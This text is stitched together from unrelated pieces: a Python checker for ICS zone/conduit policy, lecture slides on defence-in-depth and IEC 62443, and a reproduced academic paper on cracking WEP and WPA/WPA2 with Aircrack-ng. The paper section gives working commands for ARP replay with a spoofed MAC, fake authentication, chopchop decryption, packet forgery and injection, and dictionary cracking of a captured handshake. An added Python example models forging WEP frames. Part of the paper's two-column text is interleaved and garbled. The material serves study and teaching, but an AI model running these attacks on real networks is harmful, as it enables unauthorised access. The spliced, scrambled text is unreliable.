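The default-deny conduit policy and the dual-homed rule from the segmentation and segregation slides, as an added example (not part of the lecture material): the zone address ranges, the allowed conduits, the host inventory and the flow records are all constructed to model the corporate / DMZ / control layout the slides describe.

```python
"""Default-deny zone/conduit policy check for an ICS architecture.

Added example, not from the lecture slides. Zones, conduits, hosts and flow
records below are constructed; they model a corporate / DMZ / control layout.
"""
import ipaddress
from dataclasses import dataclass

# Security domains (zones): each managed by one authority with one policy.
ZONES = {
    "corporate": ipaddress.ip_network("10.1.0.0/16"),
    "dmz": ipaddress.ip_network("10.2.0.0/24"),
    "control": ipaddress.ip_network("10.3.0.0/24"),
}

# Allow-list of conduits as (src zone, dst zone, protocol, dst port).
# Anything not listed is denied: traffic is permitted by exception only.
CONDUITS = {
    ("corporate", "dmz", "tcp", 443),  # corporate users read the DMZ historian replica
    ("dmz", "control", "tcp", 502),    # DMZ collector polls controllers over Modbus/TCP
}

# Only these hosts may legitimately be dual-homed across zones.
FIREWALLS = {"fw-corp-dmz", "fw-dmz-control"}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dport: int


def zone_of(ip: str) -> str:
    """Map an address to its zone; anything outside the defined zones is external."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "external"


def evaluate(flow: Flow) -> tuple:
    """Return (verdict, reason) for one flow under the default-deny conduit policy."""
    src_zone, dst_zone = zone_of(flow.src), zone_of(flow.dst)
    if src_zone == dst_zone:
        return "allow", f"intra-zone traffic within {src_zone}"
    if (src_zone, dst_zone, flow.proto, flow.dport) in CONDUITS:
        return "allow", f"permitted conduit {src_zone}->{dst_zone} {flow.proto}/{flow.dport}"
    if {src_zone, dst_zone} == {"corporate", "control"}:
        return "deny", "corporate and control must only communicate via the DMZ"
    if "external" in (src_zone, dst_zone):
        return "deny", "no direct path between external networks and internal zones"
    return "deny", f"no conduit {src_zone}->{dst_zone} {flow.proto}/{flow.dport}"


def parse_flow_log(lines):
    """Parse constructed flow records of the form 'src dst proto dport'."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, proto, dport = line.split()
        flows.append(Flow(src, dst, proto.lower(), int(dport)))
    return flows


def audit_flows(lines):
    """Return the flows the boundary devices should have blocked, with reasons."""
    denied = []
    for flow in parse_flow_log(lines):
        verdict, reason = evaluate(flow)
        if verdict == "deny":
            denied.append((flow, reason))
    return denied


def dual_homed_violations(hosts: dict) -> list:
    """Flag non-firewall hosts whose interfaces span the corporate and control zones."""
    bad = [name for name, addrs in hosts.items()
           if {"corporate", "control"} <= {zone_of(a) for a in addrs} and name not in FIREWALLS]
    return sorted(bad)


# Constructed sample data: observed flows and a host interface inventory.
SAMPLE_FLOWS = """
# src            dst           proto dport
10.1.20.5        10.2.0.10     tcp   443
10.2.0.10        10.3.0.7      tcp   502
10.1.20.5        10.3.0.7      tcp   502
10.3.0.7         10.3.0.8      udp   2222
203.0.113.9      10.3.0.7      tcp   22
10.1.20.5        10.2.0.10     tcp   3389
""".splitlines()

SAMPLE_HOSTS = {
    "fw-corp-dmz": ["10.1.0.1", "10.2.0.1"],
    "fw-dmz-control": ["10.2.0.254", "10.3.0.1"],
    "eng-ws7": ["10.1.33.4", "10.3.0.40"],  # workstation bridging corporate and control
    "plc-12": ["10.3.0.7"],
}

if __name__ == "__main__":
    for flow, reason in audit_flows(SAMPLE_FLOWS):
        print(f"DENY {flow.src} -> {flow.dst} {flow.proto}/{flow.dport}: {reason}")
    print("dual-homed violations:", dual_homed_violations(SAMPLE_HOSTS))
```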
Defence-in-depth

• Multiple layer strategy involving two (or more) different overlapping security mechanisms
• A defense-in-depth architecture strategy includes the use of firewalls, the creation of demilitarised zones, intrusion detection capabilities along with effective security policies, training programs, incident response mechanisms and physical security.
• Also requires thorough understanding of possible attack vectors on an ICS.

ISA/IEC 62443
• ISA and IEC have developed the IEC 62443 series of standards to address the need to design cybersecurity robustness and resilience into industrial automation control systems (IACS).
• Provides the detailed information to implement a cyber-security program.
• https://www.isa.org/training-and-certifications/isa-certification/isa99iec-62443/isa99iec-62443-cybersecurity-certificate-programs/?utm_medium=social&utm_campaign=smm-training-ISA-IEC-62443-Cybersecurity-Certificate-Programs&utm_source=twitter

ISA/IEC 62443-3-2: Security Risk Assessment and System Design

• Includes the zone and conduit requirements (network segmentation and aggregation)
• You can find it in the reading list. Alternatively you can download it from UWE’s Library online webpage.

In the tutorial…

• NIST 800-82, Section 5.2 Boundary Protection
• SANS 401 Network Model
• Design defence-in-depth for an ICS.
• Attack Vectors,
• Attack Trees,
• Kill Chain

References

Chapter 5 from: https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final

IEC/ISA 62443-3-2
Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux Hacking Tools

Article in International Journal of Computer Applications (0975 – 8887), Volume 176 – No. 32, June 2020. DOI: 10.5120/ijca2020920365
Publication page: https://www.researchgate.net/publication/342283555

Michael Kyei Kissi
Department of Computer Science, Kwame Nkrumah University of Science and Technology, Kumasi, Ghana

Michael Asante, PhD
Department of Computer Science, Kwame Nkrumah University of Science and Technology, Kumasi, Ghana
ABSTRACT
The use of wireless networks as a medium of communication has tremendously increased due to their flexibility, mobility and easy accessibility. Their usage is inevitable at hotels and restaurants, airports and organizations, and is currently predominant in homes. As a large number of devices connect to wireless networks and valuable and sensitive information is shared among users in the open air, attackers can easily sniff and capture data packets. This paper aims at using penetration testing to assess vulnerabilities and conduct attacks on the Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) and 802.11i (WPA2) security protocols. The penetration testing was conducted using Kali Linux with its Aircrack-ng tools.

Keywords
IEEE, 802.11, WEP, WPA, WPA2, Kali Linux, Aircrack-ng, WLAN, Wireless, Penetration Testing, Encryption, Security.

1. INTRODUCTION
Wireless networking in today’s communication technology is tremendously increasing due to the benefits it provides, such as flexibility, mobility and easier accessibility. Most hotels and restaurants, coffee shops, airports, organizations and institutions currently provide open or secured wireless connectivity. Wireless networks can also be seen in homes [1]. The IEEE 802.11 Wireless Local Area Network (WLAN) has evolved to be the easiest and best-known network technology to set up since its inception. Its popularity is a result of the use of a Local Area Network (LAN), lower cost, and easy setup, installation and configuration procedures [2]. The availability of WLAN menaces the security of the network infrastructure, causing challenges for network administrators as well as the organization. A WLAN signal travels beyond the boundaries of a specified area, as compared to a wired network [3]. [4] noted that the wireless medium is shared among its users in the open air; attackers can easily sniff and capture data packets. A WLAN may suffer attacks and damage such as system compromise, data theft, Denial of Service (DoS) and others [5]. This study presents a security assessment of WLAN using penetration testing tools to examine and exploit identified vulnerabilities in WLAN security protocols. The penetration testing framework used for the testing was based on the National Institute of Standards and Technology (NIST) [6]. The framework involves four phases, namely the Planning Phase, Discovery Phase, Attack Phase and Reporting Phase.

2. LITERATURE REVIEW
The IEEE 802.11 gives a criterion for WLAN communications among devices [7]. The IEEE in 1997 developed the 802.11 standard, which is a subset of the 802 standards. The 802 handles the Local and Metropolitan Area Network (MAN) whilst the suffix .11 handles the WLAN [3]. The 802.11 is governed by a set of rules or protocols to aid propagation of wireless signals and communication across the wireless network. The 802.11 employs Carrier Sense Multiple Access (CSMA) and the Medium Access Control (MAC) protocol with Collision Avoidance (CA). There are versions of the standard which can be recognized by one or two ending alphabetic characters; these are 802.11a, 802.11b, 802.11g, 802.11n and 802.11ac [8]. The most common and widely used among the standards are 802.11a, 802.11b and 802.11g [7].

2.1 Attacks on WLAN
WLAN uses Radio Frequency (RF) or Infrared transmission technology for connectivity among devices, making it susceptible to attacks. Attacks on wireless networks aim at breaching the integrity and confidentiality of the network, its availability and needed information. These attacks are categorized into Passive and Active Attacks.

Passive attack: Network traffic is silently eavesdropped or monitored by an attacker, who waits until a client seeks to connect with the Access Point (AP) or searches for the network Service Set Identifier (SSID); as a result the attacker obtains the SSID in plaintext. An attacker can intercept data transmitted through the network using techniques such as Traffic Analysis, Packet Sniffing, War-Driving and Port Scanning. These types of attacks are usually difficult to detect since the attacker does not modify the content or information [9].

Active attack: The attacker does not only gain access to information but can make changes to the network information and even inject fraudulent packets into the network. An attacker can initiate commands to disrupt the usual operations of the network, such as Denial of Service (DoS), Session Hijacking, Brute-force Attack, Replay Attack, and Man in the Middle (MITM) attack [9] [10].

2.2 WLAN Security
The WLAN protocols outlined by the IEEE comprise three security standards: Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access 2 (WPA2) [11]. [12] stated that WLAN security protocols were designed to protect the network from several breaches due to the susceptibility of the Wi-Fi transmission signals, which have no limited boundaries and hence are prone to illegitimate access. According to [13] a secured WLAN must have five key requirements, namely Authentication, Access Control, Confidentiality, Non-Repudiation and Data Integrity. In spite of this, WLAN security is prone to threats such as Eavesdropping and traffic analysis, Denial of Service, Masquerade, forged packets and
among others.

2.3 Wired Equivalent Privacy (WEP)
The IEEE 802.11 developed WEP in 1999 to endow wireless networks with security comparable to the wired [3]. WEP encryption is based on the RC4 symmetric stream cipher with 40-bit and 104-bit encryption keys [7]. WEP involves two parameters for encryption and decryption: an Initialization Vector (IV), which is a three (3) byte value, and a shared WEP Key of hexadecimal digits. WEP appends a 32-bit Cyclic Redundancy Check (CRC) checksum to each transmitted data frame. The 24-bit IV, which is randomly selected, is sent together with the secret key to RC4 to produce a keystream. The plaintext is XORed with the RC4 keystream to create the cipher text, as illustrated in figure 1.

Figure 1: WEP Data Frame Encryption [14]

According to [15], WEP decrypts received data frames by regenerating the keystream using RC4 (IV and shared key), which is then XORed with the cipher text to retrieve the plaintext. A new checksum is computed and compared with the received checksum. The plaintext is accepted if the two checksums are equal, as shown in figure 2.

Figure 2: WEP Data Frame Decryption [14]

2.3.1 Weakness and Vulnerabilities in WEP
WEP uses the RC4 algorithm and a secret key to provide access control and confidentiality, and the CRC checksum for data integrity [15]. Even with these security control mechanisms, the WEP security protocol has vulnerabilities and can be exploited by attackers.

2.3.1.1 Short IV Size and Keystream Reuse
The IV has a size of 24 bits, giving 16,777,216 different RC4 cipher streams for a given WEP key, and is transmitted in clear text with each packet [16]. The IV is used to alter the keystream: when the IV value changes, so does the keystream. When more traffic is sent, unique IVs cannot be generated after transmitting 2^24 packets; hence, there is a possibility of IVs repeating (reuse) because the 24-bit space will be exhausted.

2.3.1.2 Integrity Check Value (ICV) Insecurity
The purpose of the ICV or CRC checksum is to safeguard packets in transit, preventing attackers from altering the packets [17]. The CRC is a linear function, which means an attacker can modify encrypted messages and fix the ICV to obtain a genuine-looking message. An attacker with a valid keystream can create arbitrary messages, compute the checksum and encrypt it using the keystream, since WEP allows IV reuse [18].

2.3.1.3 No Mutual Authentication
WEP authentication is client-centered or one-way authentication. The client cannot prove its identity to the AP; only the AP authenticates the client, since the WEP Key is configured on the AP [19].

2.3.1.4 Forged Authentication Messages
An attacker eavesdrops and monitors packets transmitted in order to uncover the RC4 keystream used for encryption [20]. The stream obtained is used to encrypt any challenge received, since an attacker can forge a valid authentication packet out of the keystream.

2.3.2 Attacks on WEP
2.3.2.1 Chopchop Attack
The Chopchop attack decrypts an entire WEP packet without knowing the WEP Key. An attacker decrypts the last n bytes of plaintext of an encrypted packet by sending an average of n*128 packets on the network [21]. The Chopchop attack exploits the vulnerability of the 4-byte checksum used for the integrity of the encrypted packets [22].

2.3.2.2 Fluhrer, Mantin and Shamir (FMS) Attack
The FMS attack is a statistical attack discovered by Fluhrer, Mantin and Shamir. The attack is a result of the use of weak Initialization Vectors (IVs) in the RC4 algorithm [23]. [24] describes the “weak” IVs as having a structure of B+3::ff:X (where B is the byte of the key, ff is the constant value 255, and X is irrelevant). The attacker can determine the value of B by using the information of the plaintext found in the headers of certain packets, like Address Resolution Protocol (ARP) packets [25].

2.3.2.3 ARP Replay Attack
IVs are freely reused and there is no sequence number to validate replayed packets; this gives room for an attacker to generate more packets from the captured packets [26]. ARP Request packets are easily identified based on the destination MAC address and fixed size. The attacker sniffs ARP Request packets from a legitimate host and keeps replaying that ARP Request, the host responds with ARP Responses, and therefore more traffic is generated. When enough data packets with weak IVs are collected, the WEP Key is easily cracked within a short period.

2.4 Wi-Fi Protected Access (WPA)
The Wi-Fi Alliance created WPA in 2003 to address the vulnerabilities and flaws in WEP [20]. WPA improves data encryption using a hashing algorithm called Temporal Key Integrity Protocol (TKIP), which scrambles the keys and adds an integrity check feature to prevent tampering with the encrypted keys [20]. TKIP uses the RC4 encryption algorithm, the same as WEP, but uses a hash value to determine the uniquely generated temporal key for each packet traversed. TKIP makes use of a Message Integrity Code (MIC) for integrity checking instead of the ICV used with WEP. This prevents attackers from injecting data into a packet to find the keystream used to encrypt the data [27]. It also uses sequence counters to prevent replay attacks, which improves integrity checking.

2.5 Wi-Fi Protected Access 2 (WPA2)
The Wi-Fi Alliance improved WPA in 2004 by designing 802.11i (WPA2), which uses the concept of the Robust Security Network (RSN) [20] [10]. It tackles three key security areas, namely Data Transfer Privacy, Authentication and Key Management [28]. WPA2 uses the Advanced Encryption Standard (AES) in the Counter Mode Cipher Block Chaining
- Message Authentication Code (CBC-MAC) protocol 3. Authenticator to Supplicant


(CCMP) for data encryption [29] [30]. CCMP was created as The PMK is used to decrypt it and acquires the SNonce and
part of the 802.11 security for the 802.11i (WPA2) to replace MIC when the AP receives the second message. The AP uses
WEP and TKIP [10]. The AES uses the Rijindael algorithm the received MIC to check for data integrity. The AP also
consisting of a block cipher using 128-bit, 192-bit or 256-bit derives its PTK using the same inputs and installs if the MIC
key. AES permits the use of a single encryption key to all value is valid.
packets, which removes the challenges associated with key
scheduling and key distribution related to WEP and TKIP 4. Supplicant to Authenticator
protocols [31]. Both supplicant and AP check whether the PTKs are equal by
decrypting the third message. The supplicant installs the PTK
2.5.1 WPA/WPA2-PSK Four-Way Handshake for encrypted unicast transmission and Group Transient Key
WPA/WPA2 uses dynamic keys generated from per-packet to (GTK) for broad or multicast transmission.
generate the Pairwise Master Key (PMK). According to [32],
the four-way handshake provides mutual authentication based
on the PMK, and agrees on a fresh session key known as the
Pairwise Transient Key (PTK). The four-way handshake
contains four packets (messages) exchange that occurs
between the client (Supplicant) and the AP (Authenticator).
The PMK is generated by using the hashing algorithm
PBKDF2 which requires inputs:
PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
Where:
Passphrase: The passphrase (8 to 63 characters)
SSID: the SSID of the Authenticator (AP)
Figure 3: Generation of WPA/WPA2 Four-way
SSIDlen: the length of the SSID
Handshake [33]
4096: Number of hashing iterations (through SHA1
algorithm) 2.5.2 Weakness and Vulnerabilities in
WPA/WPA2
256: Intended Key Length of the PSK All values needed to compute the PTK from the PMK are
PTK which is a dynamic key is used to produce the four-way transmitted unencrypted in the four-way handshake. The PTK
handshake during authentication. The PMK and two Nonces is a temporary key used in order not to broadcast the PMK
are used to create the PTK when connection happens [33]. and relevant information from the four-way handshake. The
weakness in WPA-PSK is as a result of the PMK [14]. The
PTK = Function (PMK, Authenticator Nonce (ANonce), PMK is derived by using the hashing algorithm PBKDF2
Supplicant Nonce (SNonce), Authenticator MAC, Supplicant MAC)

Where,

PMK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256)

PTK = PRF(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC), the PMK term itself being PBKDF2(Passphrase, SSID, ssidLen, 4096, 256)

Messages exchanged in the four-way handshake are carried in Extensible Authentication Protocol over LAN (EAPOL) frames. The EAPOL-Key frames of the four-way handshake are used for key exchange and negotiation [34]. The four-way handshake between the supplicant and the authenticator starts after the PMK has been generated on both sides. Figure 3 illustrates the four-way handshake and the installation of the PTK.

1. Authenticator to Supplicant
The authenticator (AP) generates a long random value called the Authenticator Nonce (ANonce) and sends it to the supplicant in the clear. The supplicant combines it with the PMK (shared with the AP, but unknown to an attacker) to generate the PTK at the supplicant station.

2. Supplicant to Authenticator
The supplicant replies to the received message by generating its own long random value, the Supplicant Nonce (SNonce). The ANonce, SNonce and PMK are used by the supplicant to generate the PTK. A Message Integrity Code (MIC) is computed over this message with a keyed cryptographic hash (HMAC-SHA1, keyed with the KCK portion of the PTK) so that the authenticator can check that the supplicant has installed the same key.

(Passphrase, SSID, SSIDlen, 4096, 256). The attacker runs the PBKDF2 algorithm with the SSID, the SSID length and a candidate passphrase of their own choosing to compute a candidate PMK, derives the PTK from it and compares the resulting MIC with the captured one. The attacker succeeds when the two values match, at which point the valid passphrase has been obtained. Information such as the client and AP MAC addresses, ANonce, SNonce and MIC value is transmitted in clear text and, together with the PMK, is all that is needed to generate the PTK. An attacker can therefore use brute-force and dictionary attacks to discover or crack the WPA key [10] [14] [35]. If the password exists in the attacker's dictionary or wordlist, the WPA key will be cracked.

2.5.3 Attack on WPA/WPA2
WPA/WPA2 is vulnerable to attacks against the four-way handshake and encryption protocol [36]. PTK generation is based on the PMK, the authenticator MAC, the supplicant MAC and the nonces. With the exception of the PMK, all of these parameters are transmitted in plaintext during the four-way handshake. The only value unknown to the attacker when computing the PMK is the passphrase (PSK), which can be guessed by an attacker who has captured a valid four-way handshake and runs a dictionary attack against it. The passphrase will be recovered if it exists in the dictionary or wordlist [14] [37].

3. METHODOLOGY
The environment chosen for performing the assessment and penetration testing was a WLAN infrastructure set up as an experimental network laboratory. The study used a network laboratory so as not to compromise any individual's or organization's network, for reasons of privacy and the legality of handling user information.

International Journal of Computer Applications (0975 – 8887), Volume 176 – No. 32, June 2020

3.1 Laboratory Experiment Setup and Requirements
The experiment required an authenticator (wireless router), an external wireless adapter and two laptops (one as the PenTester PC and the other as the supplicant; the supplicant could be any device with wireless connectivity). Figure 4 illustrates the connections between the devices used.

Figure 4: Setup for Penetration Testing

3.2 Exploiting Vulnerabilities in IEEE 802.11 WEP Security Protocol
Three vulnerabilities were discovered and exploited in the IEEE 802.11 WEP security protocol through the penetration testing conducted.

3.2.1 No Replay Protection Mechanism in WEP
Packets were repeatedly replayed into the network to generate more packets with weak IVs. The IVs are weak because the IV space is short and is quickly exhausted, resulting in reuse of IVs. The following steps show how the vulnerability was exploited.

The command "airodump-ng wlan0mon" was used to discover the wireless network and to sniff and capture data packets. wlan0mon is the monitor-mode interface of the attacker's wireless card; the targeted AP has the MAC address 98:FC:11:EE:41:25. Sniffed and captured data packets were saved to a file called arp-test using the command "airodump-ng --channel 6 --bssid 98:FC:11:EE:41:25 --write arp-test wlan0mon", as shown in figure 5.

Figure 5: Capture of Data Packets on Targeted Access Point

The command "aireplay-ng --arpreplay -e SecurityTest wlan0mon" was used to listen for ARP request packets to replay, so that the AP would answer with ARP response packets and the attacker could generate more traffic. Figure 6 shows that data packets (59 packets) were received but no ARP request packet was picked up for replay, because the attacker's own MAC address (00:C0:CA:83:01:CD) was being used and the AP does not accept frames from an unassociated station.

Figure 6: Detection of ARP Request Packets

The attacker therefore uses the MAC address of the legitimate client (AC:36:13:6C:6F:4A), so as not to be rejected by the AP, to repeatedly replay the received ARP request packets and collect the ARP responses, generating more packets with weak IVs, using the command "aireplay-ng --arpreplay -e SecurityTest -h AC:36:13:6C:6F:4A wlan0mon". The attacker successfully generates more packets (70593), as shown in figure 7.

Figure 7: Successful Generation of ARP Packets by Attacker

3.2.2 No Mutual Authentication makes it Vulnerable to Fake Authentication Attack
A fake authentication was conducted and the attacker was successfully associated with the AP as a result of the absence of mutual authentication. The experiment steps were as follows:

The attacker uses the command "aireplay-ng --fakeauth 0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon" to conduct a fake authentication using its own MAC address (00:C0:CA:83:01:CD) and the AP MAC address (98:FC:11:EE:41:25); the AP only authenticates its clients and never proves its own identity to them. Figure 8 shows the authentication request and association request being acknowledged by the AP. This means that the attacker got connected to the AP.

Figure 8: Successful Fake Authentication and Association with Target AP by Attacker

3.2.3 WEP is Vulnerable to Message Modification and Injection Due to ICV Insecurity
The WEP security protocol could not detect modified packets or differentiate between original and forged packets. The following steps demonstrate the vulnerability:

The attacker uses the command "aireplay-ng --chopchop -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon" to decrypt a captured encrypted data packet without the key, obtaining the keystream (replay_dec-0713-213506.xor) and the plaintext (replay_dec-0713-213506.cap), as shown in figure 9.
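The keystream and plaintext files obtained above are what the next step (packetforge-ng and re-injection) consumes. The following Python is an added worked example, not part of the paper, that models why that works: WEP's body is RC4(IV || key) XOR (plaintext || CRC-32 ICV), and because the ICV is an unkeyed linear checksum, an attacker holding one captured frame and no key can (a) flip chosen plaintext bits and correct the encrypted ICV to match, and (b) turn a known plaintext into the frame's keystream and encrypt an arbitrary new packet under the same IV. The key, IV and HTTP request are constructed; the key-ID byte of a real WEP frame is omitted; all function names are the example's own.

```python
"""Added example: a model of WEP's RC4 + CRC-32 construction and the two things an attacker can do
with a captured frame but no key: flip chosen plaintext bits while keeping the ICV valid, and forge
a whole new frame from a recovered keystream (what packetforge-ng does with a chopchop .xor file)."""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling + PRGA; returns `length` keystream bytes. WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, little-endian on the wire. Unkeyed and linear over GF(2)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_enc(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Simplified WEP body: IV (3 bytes, in clear) || RC4(IV || key) XOR (plaintext || ICV).
    The real frame also carries a key-ID byte after the IV; it is omitted in this model."""
    payload = plaintext + icv(plaintext)
    return iv + xor(payload, rc4_keystream(iv + key, len(payload)))


def wep_dec(key: bytes, frame: bytes):
    """The receiver's check: decrypt, then accept only if the ICV matches. Returns plaintext or None."""
    iv, body = frame[:3], frame[3:]
    payload = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, tag = payload[:-4], payload[-4:]
    return plaintext if icv(plaintext) == tag else None


def flip_bits(frame: bytes, offset: int, delta: bytes) -> bytes:
    """Modify an encrypted frame without the key. XORing `delta` into the ciphertext XORs it into the
    plaintext, and because CRC-32 is affine, crc(P ^ D) = crc(P) ^ crc(D) ^ crc(0...0) for equal-length
    inputs, so the attacker also knows exactly which bits of the (encrypted) ICV to flip."""
    body = bytearray(frame[3:])
    data_len = len(body) - 4
    full_delta = bytes(offset) + delta + bytes(data_len - offset - len(delta))
    for i, d in enumerate(full_delta + xor(icv(full_delta), icv(bytes(data_len)))):
        body[i] ^= d
    return frame[:3] + bytes(body)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """What chopchop (or a known-plaintext guess such as an ARP request) gives the attacker:
    keystream = ciphertext XOR (plaintext || ICV), valid for this frame's IV."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def forge_frame(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Encrypt a chosen packet under a recovered keystream, reusing its IV; the AP accepts it as valid."""
    payload = new_plaintext + icv(new_plaintext)
    if len(payload) > len(keystream):
        raise ValueError("forged packet is longer than the recovered keystream")
    return iv + xor(payload, keystream)


def demo():
    """Attacker's view: one captured frame, no key. Returns what the AP decrypts from the two forgeries."""
    key = bytes.fromhex("0badc0ffee")            # constructed 40-bit WEP key, never touched by the attacker
    iv = bytes.fromhex("010203")                 # constructed IV, sent in clear
    captured = wep_enc(key, iv, b"GET /index.html HTTP/1.0")
    tampered = flip_bits(captured, 5, xor(b"index", b"admin"))   # rewrite the path without decrypting
    keystream = recover_keystream(captured, b"GET /index.html HTTP/1.0")
    forged = forge_frame(iv, keystream, b"GET /secret HTTP/1.0")
    return wep_dec(key, tampered), wep_dec(key, forged)


if __name__ == "__main__":
    print(demo())
```

Both forgeries pass the receiver's ICV check, which is the property the paper exploits in 3.2.3 and 3.2.4: a checksum that is linear in the plaintext and sits under a stream cipher cannot authenticate anything. A keyed MAC over the ciphertext (as the CCMP MIC in WPA2 provides) is what the protocol lacked.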

Figure 9: Capture of Keystream and Plaintext files

The attacker then forged new packets from the keystream and computed their checksums using the command "packetforge-ng -0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0713-213506.xor -w packetforge-test", which saves the packets to a file called packetforge-test.

The command "aireplay-ng -2 -r packetforge-test wlan0mon" was used to inject the forged packets towards the AP so that it would generate data packets with new IVs, as shown in figure 10. These generated packets speed up the cracking of the WEP key.

Figure 10: Generation of New IVs from Forged Packets

3.2.4 Cracking of IEEE 802.11 WEP Encryption Protocol Key
The aircrack-ng tool was run in parallel while more packets with weak IVs were being generated. With 51326 IVs, 698 possible keys were tested and the WEP key was successfully cracked, as shown in figure 11.

Figure 11: WEP Key Successfully Cracked

3.3 Exploiting Vulnerabilities in IEEE 802.11 WPA/WPA2-PSK Encryption Protocol
Three vulnerabilities associated with the security protocol were discovered:
1. The four-way handshake is transmitted unencrypted (plaintext).
2. The Message Integrity Check (MIC) is unencrypted (plaintext).
3. The derivation formulae for computing the PMK and PTK are known to the attacker.

The attacker requires the capture of a valid four-way handshake (which contains the MIC and the inputs needed to derive the PMK and PTK) and a wordlist to conduct a dictionary attack against the PSK (passphrase), the only input unknown to the attacker.

Figure 12 shows a successful capture of the four-way handshake, saved to a file called wpa-handshake using the command "airodump-ng --channel 6 --bssid 98:FC:11:EE:41:25 --write wpa-handshake wlan0mon".

Figure 12: Successful Capture of WPA Handshake

3.3.1 Cracking of WPA/WPA2-PSK Passphrase
With the captured WPA handshake and a wordlist or dictionary of passwords, aircrack-ng was used to crack the WPA passphrase using the command "aircrack-ng wpa-handshake-01.cap -w passwords". The passphrase (WPA key) was successfully cracked, as shown in figure 13.

Figure 13: WPA-PSK Key (Passphrase) Successfully Cracked

4. RESULTS ANALYSIS
The vulnerabilities discovered enabled a successful crack of both wireless security protocols.

4.1 Analysis on Vulnerabilities in IEEE 802.11 WEP Encryption Protocol

4.1.1 No Replay Protection Mechanism in WEP
Packets (70593) were successfully captured and repeatedly replayed into the network to generate more packets with weak IVs, which aided the cracking of the WEP key. The ARP packets (18112) used for the replay attack were successfully captured and injected into the network to generate packets, as shown in figure 14.

Figure 14: ARP Packets Generated by Attacker

4.1.2 No Mutual Authentication makes it Vulnerable to Fake Authentication Attack
The attacker successfully performed a fake authentication and was associated with the AP, gaining access to network resources. Figure 15 shows the AP's acknowledgement of a successful authentication and association, as highlighted.

Figure 15: Successful fake Authentication and Association with Target AP by Attacker

The attacker's MAC address (00:C0:CA:83:01:CD) appeared in the discovered list of clients connected to the AP with MAC address 98:FC:11:EE:41:25, as shown in figure 16.

Figure 16: Attacker Connects to Access Point

4.1.3 WEP is Vulnerable to Message Modification and Injection Due to ICV Insecurity
Using the "chopchop" attack, the attacker was able to decrypt encrypted packets without knowing the secret key. The attacker chops the last byte off a captured encrypted packet, guesses the value of that byte, adjusts the encrypted checksum accordingly and injects the modified packet into the network; if the AP accepts the modified packet the guess was correct, otherwise the packet is rejected. A packet is rejected only because its ICV is incorrect, so the AP acts as an oracle that lets the attacker recover the plaintext and keystream byte by byte and then compute valid checksums for forged or modified packets. The decrypted packet yields the keystream file (replay_dec-0713-213506.xor) and the plaintext file (replay_dec-0713-213506.cap), as shown in figure 17. The captured keystream is then used to generate forged packets that the AP accepts as valid.

Figure 17: Saved Plaintext and Keystream files

4.1.4 Cracking of IEEE 802.11 WEP Encryption Protocol Key
WEP was designed for confidentiality rather than authentication: it uses the RC4 stream cipher for encryption and a CRC-32 checksum (the ICV) for integrity. WEP is vulnerable because of the way its IV mechanism is implemented. The 24-bit IV space is exhausted within a few hours, after which IVs are duplicated. The chopchop attack, developed by KoreK, exploits a weakness in the WEP protocol itself (the linear, unkeyed CRC-32 ICV) rather than a weakness in the RC4 algorithm. Without knowing the secret key, the attacker was able to capture and decrypt encrypted packets to obtain the keystream and plaintext. Chosen plaintext is XORed with the recovered keystream to produce forged ciphertext, which is injected into the network to make the AP generate more packets with weak IVs. The IVs are transmitted in clear text and are concatenated with the secret shared key to form the RC4 seed, which is what the statistical key-recovery attack relies on. As more weak IVs are collected, the probability of cracking the WEP key increases. With 51326 weak IVs collected, the WEP key was successfully cracked by aircrack-ng, as shown in figure 18.

The results show that WEP is vulnerable to attack. The WEP key can be cracked without any active client connected to the network. Also, without knowing the WEP key, the plaintext and keystream can be obtained and used to generate the traffic from which the key is cracked.

Figure 18: WEP Key Successfully cracked

4.2 Analysis on Vulnerabilities in IEEE 802.11 WPA/WPA2-PSK Encryption Protocol
WPA/WPA2-PSK is vulnerable to attack because the four-way handshake is transmitted unencrypted (plaintext). All of the parameters used for the mutual authentication (PMK and PTK generation) between the supplicant and the authenticator (AP) are known to an attacker except the passphrase. The PMK and PTK are derived as follows:

PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)

PTK = PRF(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)

The captured four-way handshake was analyzed with

Wireshark. The first message of the EAPOL handshake was transmitted from the AP to the supplicant and comprises a 256-bit random number, the ANonce, used for PTK generation at the supplicant. The AP MAC address and the ANonce were visible in the clear, as highlighted in figure 19.

Figure 19: First Message of the WPA Four-way Handshake (ANonce and AP MAC Address)

